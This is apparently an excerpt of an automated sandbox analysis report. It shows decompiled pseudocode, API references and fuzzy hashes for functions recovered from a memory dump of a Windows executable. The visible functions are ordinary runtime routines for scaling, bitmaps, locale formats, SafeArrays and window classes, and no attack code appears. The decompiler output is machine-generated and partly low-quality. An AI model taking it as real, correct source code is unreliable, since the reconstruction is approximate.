Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID: <n@
API String ID: 185507032-1603453535
Opcode ID: 3c70ff4b161b97992de8a8bdb0083b2ebef119158255d70ea65e91e9ab4b5015
Instruction ID: 3337acb7f3d6c81d78a7202f023ff6680b571d3980c66fe4f8ee475db1a1f59a
Opcode Fuzzy Hash: 3c70ff4b161b97992de8a8bdb0083b2ebef119158255d70ea65e91e9ab4b5015
Instruction Fuzzy Hash: 8D115EB21042047AD200FBA5CC86F9F77ACAB44704F80493BB759F61E2DA79D95487AE

Uniqueness

Uniqueness Score: -1.00%

Function 0042BB64, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042BB64(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x42bd10; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x42bd08; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x42bd10; // 0x0
				if(_t113 != (_t107 &  *0x42bd0c)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x42bd10; // 0x0
				if(_t114 != (_t107 &  *0x42bd14)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041CB08( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041CAEC( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

0x0042bb6b
0x0042bb6e
0x0042bb70
0x0042bb75
0x0042bcf2
0x0042bcf2
0x0042bcf7
0x0042bd04
0x0042bd04
0x0042bb7f
0x0042bb89
0x0042bb81
0x0042bb81
0x0042bb81
0x0042bb92
0x0042bba6
0x0042bb94
0x0042bba2
0x0042bba2
0x0042bbac
0x0042bbc5
0x0042bbae
0x0042bbbc
0x0042bbbc
0x0042bbcc
0x0042bc06
0x0042bc09
0x0042bbd4
0x0042bbd7
0x0042bbfb
0x0042bc00
0x0042bbd9
0x0042bbea
0x0042bbec
0x0042bbec
0x0042bbd7
0x0042bc10
0x0042bc15
0x0042bc59
0x0042bc1d
0x0042bc25
0x0042bc50
0x0042bc27
0x0042bc3c
0x0042bc3c
0x0042bc25
0x0042bc71
0x0042bc7f
0x0042bc87
0x0042bc9a
0x0042bc9a
0x0042bca8
0x0042bcb0
0x0042bcc3
0x0042bcc3
0x0042bccd
0x0042bced
0x0042bced
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 0042BB9D
MulDiv.KERNEL32(?,?,?), ref: 0042BBB7
MulDiv.KERNEL32(?,?,?), ref: 0042BBE5
MulDiv.KERNEL32(?,?,?), ref: 0042BBFB
MulDiv.KERNEL32(?,?,?), ref: 0042BC33
MulDiv.KERNEL32(?,?,?), ref: 0042BC4B
MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC95
MulDiv.KERNEL32(?,?,0000001F), ref: 0042BCBE
MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042BCE4

Part of subcall function 0041CB08: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041CB15

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce23d709c76e153ff642a26e6cadc1ed2c57ed492664058bc0ef9bce18cb9c1
Instruction ID: bb195871c61b64ae7841912bbad3734f763241822c3d9a27d57236ce26fd63a3
Opcode Fuzzy Hash: 8ce23d709c76e153ff642a26e6cadc1ed2c57ed492664058bc0ef9bce18cb9c1
Instruction Fuzzy Hash: 11513D70708760AFC320DB6AD885B6BBBE9EF49304F44481EB9D6C7352C779E8408B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041DABC, Relevance: 13.6, APIs: 9, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041DABC(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406484();
				_v28 = __eax;
				_push(0);
				L00406484();
				_v32 = __eax;
				_push(_t87);
				_push(0x41dc0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L0040677C();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041DA04(__ecx);
					}
					_push(_t87);
					_push(0x41db79);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L0040647C();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041DA04(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x41db80);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L004069B4();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L0040646C();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x41dc11);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x0041dabd
0x0041dabf
0x0041daca
0x0041dacb
0x0041dacc
0x0041dace
0x0041dad1
0x0041dad3
0x0041dad8
0x0041dadb
0x0041dadd
0x0041dae2
0x0041dae7
0x0041dae8
0x0041daed
0x0041daf0
0x0041dafd
0x0041db04
0x0041db1e
0x0041db20
0x0041db25
0x0041db2c
0x0041db2e
0x0041db2e
0x0041db35
0x0041db36
0x0041db3b
0x0041db3e
0x0041db44
0x0041db48
0x0041db49
0x0041db4c
0x0041db4d
0x0041db52
0x0041db59
0x0041db5b
0x0041db5b
0x0041db62
0x0041db65
0x0041db68
0x0041db6d
0x0041db70
0x0041db71
0x0041db73
0x0041db78
0x0041db06
0x0041db06
0x0041db08
0x0041db0a
0x0041db0f
0x0041db10
0x0041db13
0x0041db14
0x0041db19
0x0041db84
0x0041db93
0x0041dba2
0x0041dbc9
0x0041dbd0
0x0041dbd7
0x0041dbd7
0x0041dbde
0x0041dbe5
0x0041dbe5
0x0041dbde
0x0041dbec
0x0041dbef
0x0041dbf2
0x0041dbfb
0x0041dc09
0x0041dc09

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041DAFD
72E7AC50.USER32(00000000,00000000,0041DC0A,?,00000000,00000000), ref: 0041DB20
SelectObject.GDI32(?,?), ref: 0041DB8E
SelectObject.GDI32(?,00000000), ref: 0041DB9D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041DBC9
SelectObject.GDI32(?,00000000), ref: 0041DBD7
SelectObject.GDI32(?,00000000), ref: 0041DBE5
DeleteDC.GDI32(?), ref: 0041DBFB
DeleteDC.GDI32(?), ref: 0041DC04

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Object$Select$Delete$Stretch
String ID:
API String ID: 3399755780-0
Opcode ID: dddead4a353e3930485c399ca7392ca3acd0ea7f1cda65b0a4ecde25a83331d3
Instruction ID: 8f0f08a69bd8b3cff8dd1e6fb758a95d1ddfbd04ceb6ef4627d768047a618533
Opcode Fuzzy Hash: dddead4a353e3930485c399ca7392ca3acd0ea7f1cda65b0a4ecde25a83331d3
Instruction Fuzzy Hash: 7B41DFB1E44205BFDB10DBE9DD52FAFB7FCEB08704F110426B605E7281D679A9508B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040C688, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040C688(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40c953);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040C510();
				E0040AF00(__ebx, __edi, __esi);
				_t196 =  *0x47b744;
				if( *0x47b744 != 0) {
					E0040B0D8(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040AE50(_t43, 0, 0x14,  &_v20);
				E00404234(0x47b678, _v20);
				E0040AE50(_t43, 0x40c968, 0x1b,  &_v24);
				 *0x47b67c = E00408140(0x40c968, 0, _t196);
				E0040AE50(_t132, 0x40c968, 0x1c,  &_v28);
				 *0x47b67d = E00408140(0x40c968, 0, _t196);
				 *0x47b67e = E0040AE9C(_t132, 0x2c, 0xf);
				 *0x47b67f = E0040AE9C(_t132, 0x2e, 0xe);
				E0040AE50(_t132, 0x40c968, 0x19,  &_v32);
				 *0x47b680 = E00408140(0x40c968, 0, _t196);
				 *0x47b681 = E0040AE9C(_t132, 0x2f, 0x1d);
				E0040AE50(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040B188(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404234(0x47b684, _v36);
				E0040AE50(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040B188(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404234(0x47b688, _v44);
				 *0x47b68c = E0040AE9C(_t132, 0x3a, 0x1e);
				E0040AE50(_t132, 0x40c99c, 0x28,  &_v52);
				E00404234(0x47b690, _v52);
				E0040AE50(_t132, 0x40c9a8, 0x29,  &_v56);
				E00404234(0x47b694, _v56);
				E004041E0( &_v12);
				E004041E0( &_v16);
				E0040AE50(_t132, 0x40c968, 0x25,  &_v60);
				_t104 = E00408140(0x40c968, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404278( &_v8, 0x40c9c0);
				} else {
					E00404278( &_v8, 0x40c9b4);
				}
				E0040AE50(_t132, 0x40c968, 0x23,  &_v64);
				_t111 = E00408140(0x40c968, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040AE50(_t132, 0x40c968, 0x1005,  &_v68);
					if(E00408140(0x40c968, 0, _t198) != 0) {
						E00404278( &_v12, 0x40c9dc);
					} else {
						E00404278( &_v16, 0x40c9cc);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404560();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404560();
				 *0x47b746 = E0040AE9C(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040C95A);
				return E00404204( &_v68, 0x10);
			}

0x0040c688
0x0040c688
0x0040c689
0x0040c68b
0x0040c690
0x0040c690
0x0040c692
0x0040c694
0x0040c694
0x0040c697
0x0040c69a
0x0040c69b
0x0040c6a0
0x0040c6a3
0x0040c6a6
0x0040c6ab
0x0040c6b0
0x0040c6b7
0x0040c6b9
0x0040c6b9
0x0040c6c3
0x0040c6d2
0x0040c6df
0x0040c6f4
0x0040c703
0x0040c718
0x0040c727
0x0040c73a
0x0040c74d
0x0040c762
0x0040c771
0x0040c784
0x0040c799
0x0040c7a4
0x0040c7b1
0x0040c7c6
0x0040c7d1
0x0040c7de
0x0040c7f1
0x0040c806
0x0040c813
0x0040c828
0x0040c835
0x0040c83d
0x0040c845
0x0040c85a
0x0040c864
0x0040c869
0x0040c86b
0x0040c884
0x0040c86d
0x0040c875
0x0040c875
0x0040c899
0x0040c8a3
0x0040c8a8
0x0040c8aa
0x0040c8bc
0x0040c8cd
0x0040c8e6
0x0040c8cf
0x0040c8d7
0x0040c8d7
0x0040c8cd
0x0040c8eb
0x0040c8ee
0x0040c8f1
0x0040c8f6
0x0040c903
0x0040c908
0x0040c90b
0x0040c90e
0x0040c913
0x0040c920
0x0040c933
0x0040c93a
0x0040c93d
0x0040c940
0x0040c952

APIs

GetThreadLocale.KERNEL32(00000000,0040C953,?,?,00000000,00000000), ref: 0040C6BE

Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E

Strings

:mm:ss, xrefs: 0040C90E
AMPM, xrefs: 0040C8D2
mmmm d, yyyy, xrefs: 0040C7BA
:mm, xrefs: 0040C8F1
AMPM , xrefs: 0040C8E1
m/d/yy, xrefs: 0040C78D

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: ab42ebd72d697db1a999d9231cb4fbe992e286cfce06ad7496da32810eb13b7a
Instruction ID: 1b19c9678d7d2d1b90b6f838c7fed646b4145eb3627a011801fd6515b6d9ae5e
Opcode Fuzzy Hash: ab42ebd72d697db1a999d9231cb4fbe992e286cfce06ad7496da32810eb13b7a
Instruction Fuzzy Hash: 6A612C707002089BDB00FBB6D881B9E77A6DB88704F50957BB644BB3C6DA3CD905979E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF1C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040EF1C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				intOrPtr _v792;
				signed short* _v796;
				char _v800;
				char _v804;
				intOrPtr* _v808;
				void* __ebp;
				signed char _t51;
				signed int _t58;
				void* _t66;
				intOrPtr* _t78;
				intOrPtr* _t96;
				void* _t98;
				void* _t100;
				void* _t103;
				void* _t104;
				intOrPtr* _t114;
				void* _t118;
				char* _t119;
				void* _t120;

				_t105 = __ecx;
				_v780 = __ecx;
				_t96 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040EB48(0x80070057);
				}
				_t51 =  *_t96;
				if((_t51 & 0x00000fff) != 0xc) {
					_push(_t96);
					_push(_v776);
					L0040D8FC();
					return E0040EB48(_v776);
				} else {
					if((_t51 & 0x00000040) == 0) {
						_v796 =  *((intOrPtr*)(_t96 + 8));
					} else {
						_v796 =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 8))));
					}
					_v788 =  *_v796 & 0x0000ffff;
					_t98 = _v788 - 1;
					if(_t98 < 0) {
						L9:
						_push( &_v772);
						_t58 = _v788;
						_push(_t58);
						_push(0xc);
						L0040DD50();
						_v792 = _t58;
						if(_v792 == 0) {
							E0040E8A0(_t105);
						}
						E0040EE74(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _v792;
						_t100 = _v788 - 1;
						if(_t100 < 0) {
							L14:
							_t102 = _v788 - 1;
							if(E0040EE90(_v788 - 1, _t120) != 0) {
								L0040DD68();
								E0040EB48(_v796);
								L0040DD68();
								E0040EB48(_v792);
								_v780(_v792,  &_v260,  &_v804, _v796,  &_v260,  &_v800);
							}
							_t66 = E0040EEC0(_t102, _t120);
						} else {
							_t103 = _t100 + 1;
							_t78 =  &_v768;
							_t114 =  &_v260;
							do {
								 *_t114 =  *_t78;
								_t114 = _t114 + 4;
								_t78 = _t78 + 8;
								_t103 = _t103 - 1;
							} while (_t103 != 0);
							do {
								goto L14;
							} while (_t66 != 0);
							return _t66;
						}
					} else {
						_t104 = _t98 + 1;
						_t118 = 0;
						_t119 =  &_v772;
						do {
							_v808 = _t119;
							_push(_v808 + 4);
							_t18 = _t118 + 1; // 0x1
							_push(_v796);
							L0040DD58();
							E0040EB48(_v796);
							_push( &_v784);
							_t21 = _t118 + 1; // 0x1
							_push(_v796);
							L0040DD60();
							E0040EB48(_v796);
							 *_v808 = _v784 -  *((intOrPtr*)(_v808 + 4)) + 1;
							_t118 = _t118 + 1;
							_t119 = _t119 + 8;
							_t104 = _t104 - 1;
						} while (_t104 != 0);
						goto L9;
					}
				}
			}

0x0040ef1c
0x0040ef28
0x0040ef2e
0x0040ef30
0x0040ef3a
0x0040ef41
0x0040ef41
0x0040ef46
0x0040ef54
0x0040f0e2
0x0040f0e9
0x0040f0ea
0x00000000
0x0040ef5a
0x0040ef5d
0x0040ef6f
0x0040ef5f
0x0040ef64
0x0040ef64
0x0040ef7e
0x0040ef8a
0x0040ef8d
0x0040effa
0x0040f000
0x0040f001
0x0040f007
0x0040f008
0x0040f00a
0x0040f00f
0x0040f01c
0x0040f01e
0x0040f01e
0x0040f029
0x0040f034
0x0040f045
0x0040f04e
0x0040f051
0x0040f06d
0x0040f074
0x0040f07f
0x0040f096
0x0040f09b
0x0040f0b5
0x0040f0ba
0x0040f0cd
0x0040f0cd
0x0040f0d6
0x0040f053
0x0040f053
0x0040f054
0x0040f05a
0x0040f060
0x0040f062
0x0040f064
0x0040f067
0x0040f06a
0x0040f06a
0x0040f06d
0x00000000
0x00000000
0x00000000
0x0040f06d
0x0040ef8f
0x0040ef8f
0x0040ef90
0x0040ef92
0x0040ef98
0x0040ef9a
0x0040efa9
0x0040efaa
0x0040efb4
0x0040efb5
0x0040efba
0x0040efc5
0x0040efc6
0x0040efd0
0x0040efd1
0x0040efd6
0x0040eff1
0x0040eff3
0x0040eff4
0x0040eff7
0x0040eff7
0x00000000
0x0040ef98
0x0040ef8d

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EFB5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040EFD1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040F00A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F096
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040F0B5
VariantCopy.OLEAUT32(?), ref: 0040F0EA

Strings

, xrefs: 0040EF36

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: 8eadc968cc04d99d259176c1e8707c96ed514381868dcf456482f3187c2b6f4b
Instruction ID: 9a7228bb44d863e61a1a4e7368f2eb723a96991d1feacbbd7b1cdcc2aab0c300
Opcode Fuzzy Hash: 8eadc968cc04d99d259176c1e8707c96ed514381868dcf456482f3187c2b6f4b
Instruction Fuzzy Hash: CA51EA7590021D9BDB26DB59C880BD9B3FCAF48304F0445FAA609F7252D638AF858F69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F5C4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042F5C4(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x42f785);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E00428D4C != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00428D4C;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040CA08(_t94, _t95, _t109, _t111);
						}
					}
					 *0x47995c = _t111;
					_t96 =  *_t111;
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040CA08(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E004088A4( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00432878(_t111);
					E0042D0C4(_t111, E0041C87C( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00403674(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x42f78c);
					return E004041E0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x479ffc; // 0x41abe4
						E00405DCC(_t86, _t95,  &_v196);
						_t95 = _v196;
						E0040B658(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00403BF4();
					} else {
						_t108 =  *0x428474; // 0x4284c0
						if(E00403604(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E0043260C(_t94);
					}
					goto L7;
				}
			}

0x0042f5c4
0x0042f5c4
0x0042f5cd
0x0042f5d1
0x0042f5d7
0x0042f5db
0x0042f5dc
0x0042f5e1
0x0042f5e4
0x0042f5ef
0x0042f5f1
0x0042f5fb
0x0042f670
0x0042f673
0x0042f688
0x0042f690
0x0042f692
0x0042f695
0x0042f6a6
0x0042f6b0
0x0042f6b0
0x0042f6b5
0x0042f6bf
0x0042f6ce
0x0042f6d0
0x0042f6d0
0x0042f6ce
0x0042f6d5
0x0042f6e3
0x0042f6e5
0x0042f6f2
0x0042f6f4
0x0042f6f4
0x0042f70c
0x0042f72a
0x0042f72a
0x0042f732
0x0042f739
0x0042f73e
0x0042f756
0x0042f75b
0x0042f75f
0x0042f767
0x0042f767
0x0042f76e
0x0042f771
0x0042f774
0x0042f784
0x0042f606
0x0042f606
0x0042f60b
0x0042f630
0x0042f633
0x0042f639
0x0042f64f
0x0042f654
0x0042f659
0x0042f666
0x0042f66b
0x0042f613
0x0042f615
0x0042f622
0x00000000
0x00000000
0x0042f62b
0x0042f62b
0x00000000
0x0042f60b

APIs

GetClassInfoA.USER32(?,?,?), ref: 0042F688
UnregisterClassA.USER32(?,?), ref: 0042F6B0
RegisterClassA.USER32(?), ref: 0042F6C6
GetWindowLongA.USER32(00000000,000000F0), ref: 0042F702
GetWindowLongA.USER32(00000000,000000F4), ref: 0042F717
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0042F72A

Strings

@, xrefs: 0042F5FD

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: f00d7f8a5151f08e8c8b287d9fabbca050c2df15fd102f582783e03c23d178f4
Instruction ID: 7c207c5c5b40817601509759ad44ecd3db77ad52ad9c71fa32a2da123a26c552
Opcode Fuzzy Hash: f00d7f8a5151f08e8c8b287d9fabbca050c2df15fd102f582783e03c23d178f4
Instruction Fuzzy Hash: 27518030A003549BDB20EF69DC41B9AB7B9EF48708F90457AE445E73A1DB38AD49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0044B35C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0044B36F
GetWindowRect.USER32(?,?), ref: 0044B3C9
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044B401
MessageBoxA.USER32(?,?,?,?), ref: 0044B442
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044B4B8), ref: 0044B492
SetActiveWindow.USER32(?,0044B4B8), ref: 0044B4A3

Strings

(, xrefs: 0044B3A6

Memory Dump Source

